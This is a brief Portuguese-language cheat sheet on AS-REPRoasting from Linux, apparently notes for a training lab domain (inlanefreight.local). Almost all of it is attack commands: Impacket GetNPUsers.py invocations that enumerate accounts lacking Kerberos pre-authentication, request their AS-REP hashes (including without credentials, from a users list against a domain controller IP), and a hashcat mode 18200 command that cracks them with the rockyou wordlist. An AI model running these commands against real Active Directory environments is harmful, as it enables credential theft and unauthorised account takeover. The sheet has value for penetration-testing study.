AS-REPRoasting from Linux
Enumeração de usuários AS-REPRoastable
GetNPUsers.py inlanefreight.local/pixis
Solicitando Hashes AS-REPRoastable
GetNPUsers.py inlanefreight.local/pixis -request
Encontrando contas AS-REPRoastable sem autenticação
GetNPUsers.py INLANEFREIGHT/ -dc-ip 10.129.205.35 -usersfile /tmp/users.txt -format hashcat -outputfile /tmp/hashes.txt -no-pass
Quebrando Hashes do Linux
hashcat -m 18200 hashes.txt rockyou.txt
Last updated